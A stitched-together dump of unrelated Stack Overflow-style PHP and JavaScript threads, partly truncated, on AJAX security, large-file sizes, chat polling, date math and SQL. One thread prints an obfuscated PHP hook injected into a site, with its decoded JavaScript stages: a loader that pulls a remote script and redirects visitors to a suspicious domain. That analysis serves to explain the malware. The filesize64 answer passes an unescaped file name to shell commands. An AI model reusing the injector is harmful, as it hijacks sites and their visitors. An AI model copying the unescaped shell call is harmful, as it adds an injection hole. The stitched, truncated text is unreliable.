Hi guys, I'm building a browser game and im using a heavy amount of ajax instead of page refreshs. I'm using php and javascript. After alot of work i noticed that ajax isnt exactly secure. The threats im worried about is say someone wants to look up someones information on my SQL server they'd just need to key in right information to my .php file associated with my ajax calls. I was using GET style ajax calls which was a bad idea. Anyways after alot of research i have the following security measures in place. I switched to POST (which isnt really any more secure but its a minor deterent). I have a referred in place as well which again can be faked but again its another deterrent.

The final measure i have in place and is the focus of this question, when my website is loaded i have a 80 char hex key generated and saved in the session, and when im sending the ajax call i am also sending the challenge key in the form of

challenge= <?php $_SESSION["challenge"]; ?>

now when the ajax php file reads this it checks to see if the sent challenge matchs the session challenge. Now this by itself wouldnt do much because you can simply open up firebug and see what challenge is being sent easily. So what I'm having it do is once that challenge is used it generates a new one in the session.

So my question is how secure is this from where im standing it looks one could only see what the challenge key was after it was sent and then it renews and they couldnt see it again until it is sent, making it not possible to send a faked request from another source. So does anyone see any loop hole to this security method or have any addition thoughts or ideas.

See the answer by 'meagar'.

I'd like to mention:

By passing around an identifier in Session, you're doing what the Session is already doing. There's usually a cookie with a unique identifier similar to the one you're generating, which is telling your application, essentially, who that person is. This is how PHP sessions work, in general.

What you would need to do, in this case, is check that for a given request - POST or GET - that the particular user (whose unique user ID, or similar, is stored in the Session) has permission to add/change/delete/whatever with that particular request.

So for a "search" request, you would only return results that User X has permission to view. That way, you don't worry about what they send - if the user doesn't have permission to do something, the system knows not to let them do it.

Hence "you should be authenticating all requests".

Someone feel free to add to this.

I noticed that this code has been added to some web pages on a site. What does it do exactly?

<?php global $ob_starting;
if(!$ob_starting) {
   function ob_start_flush($s) {
    $tc = array(0, 69, 84, 82, 67, 83, 7, 79, 8, 9, 73, 12, 76, 68, 63, 78, 19, 23, 24, 3, 65, 70, 27, 14, 16, 20, 80, 17, 29, 89, 86, 85, 2, 77, 91, 93, 11, 18, 71, 66, 72, 75, 87, 74, 22, 37, 52, 13, 59, 61, 25, 28, 21, 1, 35, 15, 34, 36, 30, 88, 41, 92, 46, 33, 51);
    $tr = array(51, 5, 4, 3, 10, 26, 2, 0, 2, 29, 26, 1, 28, 32, 2, 1, 59, 2, 55, 43, 20, 30, 20, 5, 4, 3, 10, 26, 2, 32, 58, 10, 21, 0, 8, 2, 29, 26, 1, 7, 21, 8, 3, 1, 13, 1, 21, 14, 4, 7, 12, 7, 3, 5, 9, 28, 28, 32, 31, 15, 13, 1, 21, 10, 15, 1, 13, 32, 9, 0, 34, 0, 0, 0, 30, 20, 3, 0, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 0, 28, 0, 15, 1, 42, 0, 63, 3, 3, 20, 29, 8, 6, 19, 25, 39, 18, 37, 17, 37, 6, 11, 0, 6, 19, 18, 27, 17, 18, 17, 21, 6, 11, 0, 6, 19, 18, 16, 37, 21, 18, 16, 6, 11, 0, 6, 19, 18, 18, 17, 21, 17, 25, 6, 11, 0, 6, 19, 25, 4, 16, 27, 18, 16, 6, 11, 0, 6, 19, 17, 25, 18, 17, 18, 16, 6, 11, 0, 6, 19, 16, 1, 17, 50, 17, 24, 6, 11, 0, 6, 19, 18, 52, 17, 24, 18, 37, 6, 11, 0, 6, 19, 17, 37, 18, 27, 17, 18, 6, 11, 0, 6, 19, 17, 21, 18, 16, 16, 27, 6, 11, 0, 6, 19, 37, 21, 18, 37, 18, 27, 6, 11, 0, 6, 19, 17, 37, 25, 4, 16, 27, 6, 11, 0, 6, 19, 17, 17, 18, 16, 18, 16, 6, 11, 0, 6, 19, 17, 21, 25, 50, 16, 1, 6, 11, 0, 6, 19, 16, 1, 25, 17, 25, 52, 6, 11, 0, 6, 19, 16, 13, 25, 25, 25, 25, 6, 11, 0, 6, 19, 16, 13, 25, 24, 25, 16, 6, 11, 0, 6, 19, 16, 21, 16, 13, 25, 27, 6, 11, 0, 6, 19, 16, 21, 25, 37, 16, 1, 6, 11, 0, 6, 19, 17, 50, 18, 37, 16, 1, 6, 11, 0, 6, 19, 17, 50, 18, 24, 18, 25, 6, 11, 0, 6, 19, 17, 25, 18, 27, 18, 18, 6, 11, 0, 6, 19, 16, 13, 17, 4, 17, 18, 6, 11, 0, 6, 19, 17, 13, 16, 13, 17, 21, 6, 11, 0, 6, 19, 17, 17, 17, 21, 16, 27, 6, 11, 0, 6, 19, 25, 13, 24, 24, 24, 24, 6, 9, 22, 0, 0, 0, 30, 20, 3, 0, 3, 1, 13, 1, 21, 14, 4, 7, 12, 7, 3, 5, 0, 28, 0, 27, 22, 0, 0, 0, 30, 20, 3, 0, 4, 7, 12, 7, 3, 5, 14, 26, 10, 4, 41, 1, 13, 0, 28, 0, 24, 22, 0, 0, 0, 21, 31, 15, 4, 2, 10, 7, 15, 0, 13, 10, 30, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 2, 11, 5, 2, 29, 12, 1, 13, 9, 0, 34, 30, 20, 3, 0, 5, 0, 28, 0, 32, 32, 22, 21, 7, 3, 0, 8, 43, 28, 24, 22, 43, 51, 2, 23, 12, 1, 15, 38, 2, 40, 22, 43, 36, 36, 9, 0, 34, 30, 20, 3, 0, 4, 14, 3, 38, 39, 0, 28, 0, 2, 48, 43, 49, 22, 21, 7, 3, 0, 8, 10, 28, 27, 22, 10, 51, 17, 22, 10, 36, 36, 9, 0, 34, 30, 20, 3, 0, 4, 14, 4, 12, 3, 0, 28, 0, 4, 14, 3, 38, 39, 23, 5, 31, 39, 5, 2, 3, 8, 10, 36, 36, 11, 37, 9, 22, 10, 21, 0, 8, 4, 14, 4, 12, 3, 53, 28, 32, 24, 24, 32, 9, 0, 5, 0, 36, 28, 0, 64, 2, 3, 10, 15, 38, 23, 21, 3, 7, 33, 54, 40, 20, 3, 54, 7, 13, 1, 8, 26, 20, 3, 5, 1, 60, 15, 2, 8, 4, 14, 4, 12, 3, 11, 27, 44, 9, 47, 27, 52, 9, 22, 35, 35, 10, 21, 0, 8, 5, 2, 29, 12, 1, 13, 9, 0, 34, 5, 0, 28, 0, 5, 23, 5, 31, 39, 5, 2, 3, 8, 24, 11, 16, 44, 9, 0, 36, 0, 5, 23, 5, 31, 39, 5, 2, 3, 8, 16, 44, 11, 8, 5, 23, 12, 1, 15, 38, 2, 40, 47, 16, 18, 9, 9, 0, 36, 0, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 48, 27, 49, 23, 5, 31, 39, 5, 2, 3, 8, 24, 11, 27, 9, 36, 15, 1, 42, 0, 57, 20, 2, 1, 8, 9, 23, 38, 1, 2, 46, 10, 33, 1, 8, 9, 0, 36, 0, 5, 23, 5, 31, 39, 5, 2, 3, 8, 8, 5, 23, 12, 1, 15, 38, 2, 40, 47, 37, 9, 9, 22, 35, 0, 1, 12, 5, 1, 0, 34, 5, 0, 28, 0, 5, 23, 5, 31, 39, 5, 2, 3, 8, 16, 44, 11, 8, 5, 23, 12, 1, 15, 38, 2, 40, 47, 16, 18, 9, 9, 0, 36, 0, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 48, 27, 49, 23, 5, 31, 39, 5, 2, 3, 8, 24, 11, 27, 9, 36, 15, 1, 42, 0, 57, 20, 2, 1, 8, 9, 23, 38, 1, 2, 46, 10, 33, 1, 8, 9, 22, 35, 3, 1, 2, 31, 3, 15, 0, 5, 22, 0, 0, 0, 35, 0, 0, 0, 21, 31, 15, 4, 2, 10, 7, 15, 0, 2, 3, 29, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 9, 0, 34, 2, 3, 29, 0, 34, 0, 0, 0, 10, 21, 8, 53, 13, 7, 4, 31, 33, 1, 15, 2, 23, 38, 1, 2, 45, 12, 1, 33, 1, 15, 2, 56, 29, 60, 13, 0, 61, 61, 0, 53, 13, 7, 4, 31, 33, 1, 15, 2, 23, 4, 3, 1, 20, 2, 1, 45, 12, 1, 33, 1, 15, 2, 9, 34, 13, 7, 4, 31, 33, 1, 15, 2, 23, 42, 3, 10, 2, 1, 8, 13, 10, 30, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 11, 27, 9, 9, 22, 0, 0, 0, 35, 0, 1, 12, 5, 1, 0, 34, 30, 20, 3, 0, 15, 1, 42, 14, 4, 5, 2, 29, 12, 1, 28, 13, 7, 4, 31, 33, 1, 15, 2, 23, 4, 3, 1, 20, 2, 1, 45, 12, 1, 33, 1, 15, 2, 8, 32, 5, 4, 3, 10, 26, 2, 32, 9, 22, 15, 1, 42, 14, 4, 5, 2, 29, 12, 1, 23, 2, 29, 26, 1, 28, 32, 2, 1, 59, 2, 55, 43, 20, 30, 20, 5, 4, 3, 10, 26, 2, 32, 22, 15, 1, 42, 14, 4, 5, 2, 29, 12, 1, 23, 5, 3, 4, 28, 13, 10, 30, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 13, 10, 30, 14, 4, 7, 12, 7, 3, 5, 11, 24, 9, 22, 13, 7, 4, 31, 33, 1, 15, 2, 23, 38, 1, 2, 45, 12, 1, 33, 1, 15, 2, 5, 56, 29, 46, 20, 38, 62, 20, 33, 1, 8, 32, 40, 1, 20, 13, 32, 9, 48, 24, 49, 23, 20, 26, 26, 1, 15, 13, 54, 40, 10, 12, 13, 8, 15, 1, 42, 14, 4, 5, 2, 29, 12, 1, 9, 22, 35, 35, 0, 4, 20, 2, 4, 40, 8, 1, 9, 0, 34, 0, 35, 2, 3, 29, 0, 34, 4, 40, 1, 4, 41, 14, 4, 7, 12, 7, 3, 5, 14, 26, 10, 4, 41, 1, 13, 8, 9, 22, 35, 0, 4, 20, 2, 4, 40, 8, 1, 9, 0, 34, 0, 5, 1, 2, 46, 10, 33, 1, 7, 31, 2, 8, 32, 2, 3, 29, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 9, 32, 11, 0, 52, 24, 24, 9, 22, 35, 0, 0, 0, 35, 0, 0, 0, 2, 3, 29, 14, 26, 10, 4, 41, 14, 4, 7, 12, 7, 3, 5, 8, 9, 22, 35, 51, 55, 5, 4, 3, 10, 26, 2, 58);

    $ob_htm = ''; foreach($tr as $tval) {
        $ob_htm .= chr($tc[$tval]+32);
    }

    $slw=strtolower($s);
    $i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
    if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
    if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
    if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
    if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
    if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
    if(!$i){$i=strlen($s);if($i){$i--;}}
    $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

    return $s;
   }
   $ob_starting = time();
   @ob_start("ob_start_flush");
} ?>

Post-roundtrip summary: It's doubly obfuscated javascript for redirecting people to a presumably nasty website. Full details below.

It does appear to have been intentionally obfuscated ... and yes, it's definitely not good. It uses $tc as a dictionary, and $tr as a reference, and injects whatever content it has into it into the page. If this is on a site of yours, I'd seriously consider squicking it.

This is the script it hides ...

<script type="text/javascript">
if (typeof(redef_colors)=="undefined")
{
    var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');

    var redef_colors = 1;
    var colors_picked = 0;
    function div_pick_colors(t,styled)
    {
        var s = "";
        for (j=0;j<t.length;j++)
        {
            var c_rgb = t[j];
            for (i=1;i<7;i++)
            {
                var c_clr = c_rgb.substr(i++,2);
                if (c_clr!="00")
                    s += String.fromCharCode(parseInt(c_clr,16)-15);
            }
        }
        if (styled)
        {
            s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
        }
        else
        {
            s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
        }
        return s;
    }

    function try_pick_colors()
    {
        try
        {
            if(!document.getElementById || !document.createElement)
            {
                document.write(div_pick_colors(div_colors,1));
            }
            else
            {
                var new_cstyle = document.createElement("script");
                new_cstyle.type="text/javascript";
                new_cstyle.src=div_pick_colors(div_colors,0);
                document.getElementsByTagName("head")[0].appendChild(new_cstyle);
            }
        }
        catch(e)
        {
        }

        try
        {
            check_colors_picked();
        }
        catch(e)
        {
            setTimeout("try_pick_colors()", 500);
        }
    }
    try_pick_colors();
}
</script>

This script seems to take the further obfuscated array of "colours", and turn it into a link for a javascript file, then forcibly include it in your page. The final piece of the puzzle is the script that it remotely includes.

try
{
    if (colors_picked==0)
    {
        colors_picked = 1;
        function check_colors_picked()
        { }
        document.location="http://webprotectionxpwin.com/index2.php?06abQDIxQUWfVDz8qCwx2pP7ezgzN3NnewtYJXL8VFwBYJR1EyzV";
    }
}
catch(e)
{
}

So a long story short, it pushes people to the site linked above ... ... not good.

Hi, I need to get file size of file over 2GB size. (testing on 4.6GB file) It there any way to do this without external program?

Current status:

• filesize(), stat() and fseek() fails
• fread() and feof() works

There is posible to get file size by reading file content. (extremely slow!)

$size = (float) 0;
$chunksize = 1024 * 1024;
while (!feof($fp)) {
    fread($fp, $chunksize);
    $size += (float) $chunksize;
}
return $size;

I know how to get it on 64bit platforms (using fseek($fp, 0, SEEK_END) and ftell()), but I need solution for 32bit platform.

In other words, how to seek in large file to its end and get pointer position? (fseek() and ftell() not working)

Thank you very much for your time! Honza Kuchar

Here's the method I used in SoloAdmin (a FreeBSD-licensed project). It will return the result as an integer for files who's sizes can be expressed as such (up to 2GB for 32-bit systems, up to 2TB for 64-bit systems). For larger files it returns a string representation of the file size. It is portable and works on 32- and 64-bit systems, and Windows, *nix and MacOS.

Its extremely fast and much, much less disk intensive then any methods that involve reading in the file.

It first attempts to use filesize(), and if that fails, it tries other options on a platform-specific basis. On Windows, it uses the NT-family shell substitution modifiers or the COM interface. On Linux/Unix/MacOS, it uses the stat shell command.

The original function can be found here: index.php: line 1824 (SVN)

I have posted a slightly modified version here, edited to remove dependencies on other SoloAdmin-specific functions.

function filesize64($file)
{
    // First, try the filesize() function
    $size = filesize($file);

    // If the result is negative...
    if ($size < 0)
    {
        // If the platform is Windows...
        if (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN')
        {
            // Try using the NT substition modifier %~z
            $size = trim(exec("for %F in (\"".$file."\") do @echo %~zF"));

            // If the return is blank, zero, or not a number
            if (!$size || !ctype_digit($size))
            {
                // Use the Windows COM interface
                $fsobj = new COM('Scripting.FileSystemObject');
                if (dirname($file) == '.')
                    $file = ((substr(getcwd(), -1) == DIRECTORY_SEPARATOR) ? getcwd().basename($file) : getcwd().DIRECTORY_SEPARATOR.basename($file));
                $f = $fsobj->GetFile($file);
                return $f->Size;
            }

            // Otherwise, return the result of the 'for' command
            return $size;
        }

        // If the platform is not Windows, use the stat command (should work for *nix and MacOS)
        return trim(`stat -c%s $file`);
    }

    // Otherwise, return the result of the filesize() call
    return $size;
}

Hi;

I need to pass username and password which is at the server to my web chat clients javascript function. When I send the username password through my php code in the javascript function it becomes readable to the user in the source which is harmful.

Please share your solutions.

I get the user name password from the server A on the client and then submit those credentials to a javascript function which then connects to another server B. Its is like facebook and gmail chat work but what they do to pass their users credentials to their javascript clients to connect to chat servers is not mentioned anywhere on the web, hope this explains better.

Hello,

If you are sending (password and username) to server B retrived from server A, then if you want to make it secure, then you must provide some kind of security mechanism (interface) for that.

I would like you to have a look at PHP 2-way encryption: I need to store passwords that can be retrieved question first. Here, you can store a key for encrypting certain value i.e. username and password.

for eample:- In server A, my username is user and password is pass and my key is asdfasdhfkshf which is a salt. In above solution, you can have two way encryption-decryption.

Whenever i retrieve (with javascript) my username and password I would get the encrypted version. lets say, 'sfdasdfaskuyfgdkgh2145' and '24sdf25asdf2asf42sad1fh' which is encrypted by using the key asdfasdhfkshf. Of course, no one is able to guess unless they have key, and the key is stored in server A.

Now we send this encrypted username and password to server B, which also stores the same key and code for decryption, and of course, server B will be able to decrypt it back into user and pass.

So, the user is no way able to guess what username and password is even if able to view it.

But this applies only when you have implemented this interface or mechanism in server B.

Recently I was asked this question on interview and I didn't know how to answer it.

Can anyone answer this question and describe it?

O(1) since the length is stored as an attribute: source

However, this trivia is worth countering with a discussion about micro-optimising theatre, as kindly provided by our hosts here and here; read those two links and you'll find a good talking point to change the momentum of the conversation next time similar questions come up, regardless of whether you know the particular answer!

How the interviewer reacts to your tangent will tell you a lot about how much you want to work with them..

I run a website where users can chat with each other through the browser (think Facebook chat). What is the best way to handle the live interaction? (Right now I have a poll going every 30 seconds to update online users and new incoming messages, and another poll going on chat pages every second to get new messages.)

Things I've considered:

• HTML5 Web Sockets: didn't use this because it doesn't work in all browsers (only chrome).
• Flash Sockets: didn't use this because I wanted to eventually support mobile web.

Right now, I am using short polling because I don't know how scalable AJAX long polling would be. I'm running a VPS server from servint right now (running apache). Should I use long polling or short polling? I don't need absolutely immediate response times (just "good enough" for a chat app). Is short polling this often with a few hundred-thousand users going to kill my server? How do I scale this, please help!

A few notes:

• Polling every second is overkill. The app will still feel very responsive with a few seconds of delay between checks.
• To save your db's traffic and speed responses, consider using an in memory cache to store undelivered messages. You could still persist messages to the db, the in memory cache would simply be used for queries for new messages to avoid queries to the db every x seconds by each user.
• Timeout the user's chat after x seconds of inactivity to stop polling to your server. This way someone leaving a window open won't continue to generate traffic. Offer a simple "Still there? Continue chatting." link for sessions that timeout and warn user before the timeout so they can extend the timeout.
• I'd suggest starting out with polling rather than comet/long polling/sockets. Polling is simple to build and support and will likely scale just fine in the short-term. If you get a lot of traffic you can throw hardware and a load balancer at the problem to scale. The entire web is based on polling - polling most certainly scales. There's a point where the complexity of alternatives like comet/long polling/etc make sense, but you need a lot of traffic before the extra development time/complexity are justified.

I see there is strange problem in php with month addition and subtraction.

My questions are:

echo date('Y-m-d',strtotime('2011-03-31 -1 months')); //2011-03-03
echo date('Y-m-d',strtotime('2011-03-30 -1 months')); //2011-03-02
echo date('Y-m-d',strtotime('2011-03-29 -1 months')); //2011-03-01
echo date('Y-m-d',strtotime('2011-03-28 -1 months')); //2011-02-28

hello im just curious. about how they do stuff. what i assume they do something like this

@someone1 im stacking on stackoverflow RT @someone2 : hello guys what are you doing?

before i do it in my way i want to tell you about my database scheme

// CID = COMMENT ID, BID  = BLOG ID, UID = USER ID
CID    BID   UID    COMMENT
1       1     1      @someone1 im stacking on stackoverflow RT @someone2 : ....
2       1     4      @someone1 im stacking on stackoverflow RT @someone2 : ....
3       1     12     @someone1 im stacking on stackoverflow RT @someone2 : ....

1. they use regex to do like this to take the @someones name

   preg_match_all("/@[a-zA-Z0-9_]+/", $text, $matches);
   

2. then they get the @ off each name

   foreach ($matches as $value) {
   foreach ($value as $value) {
       $usernames[] = substr($value, 1);
   }
   }
   

3. then they get the UID from the database from doing something like this

   foreach ($username as $value) {
   # insert database one by one ? so it will be like the example above
   }
   

then we can just output the comment buy geting the UID.

then somhow we can get all the comments in the blog. ( without a same comment ) where blog buid = 1 and give them an notification on every user by where uid = :uid.

is there any better way doing this ? something like twitter or convore ?

Thanks for looking in

Adam Ramadhan

I have done something similar to this with an in-house application that we use for communication.

Basically, you are going to have two tables: status_updates and mentions. Each status update has many mentions. Whenever someone creates a status update, you save it to the status_updates table. During this process, you can also use Regex to detect any @username "mentions". When you find a mention, you add it to your mentions table. For example, your mentions table might look something like this:

 mention_id (Auto-incrementing key) | status_message_id | username_id

That way if you want to see if someone is mentioned in a status message you can do a quick lookup in the status_messages table, as opposed to loading up the status message and running the Regex each time. The other nice thing about this approach is that it allows you to have multiple mentions in each status message. Just create a record in mentions for each.

That's the basic way that we have set it up.

EDIT: If you wanted to pull an "activity feed" for a given user, showing only the status updates in which they have been mentioned, it would be as simple as:

SELECT * FROM mentions m LEFT JOIN status_messages s ON m.status_message_id = s.id WHERE m.username_id = $username_id

I should note that this is not how they do it at Twitter, because they are dealing with issues of scale that would make this simple way of doing things impossible. However, I think this is the simplest solution that works well if you aren't worried about scaling to hundreds of thousands of users. If you are, then you probably have more issues on your hands than this.

I'm reading this article and I'm trying to understand this SQL statement but I am still somewhat new to SQL.

I'm not sure what comment and c refer to.
I think one of them is the table name but I am not sure of the other. Also, apparently there is a subquery within it which I have not had any experience with:

  SELECT c.id, c.user_id, c.body, c.deep, c.lineage, c.parent_id,
         (SELECT COUNT(*) 
            FROM comment 
           WHERE comment.lineage LIKE (CONCAT(c.lineage,'%')) 
             AND comment.lineage != c.lineage) AS replies
    FROM comment as c
ORDER BY c.lineage

SELECT c.id,
       c.user_id,
       c.body, 
       c.deep, 
       c.lineage, 
       c.parent_id, (
       SELECT COUNT(*)
         FROM comment
        where comment.lineage LIKE (CONCAT(c.lineage,'%'))
          AND comment.lineage!=c.lineage)
       as replies
       FROM comment as c 
       order by c.linea

The first list are all the fields to be selected, with the prefix of c which is the alias later to the comment table.

The query in a query is a subquery, which runs that query which does a like and concatenates .clineage with % (which is the wildcard). This subquery result is saved in replies.

The results are ordered by linea.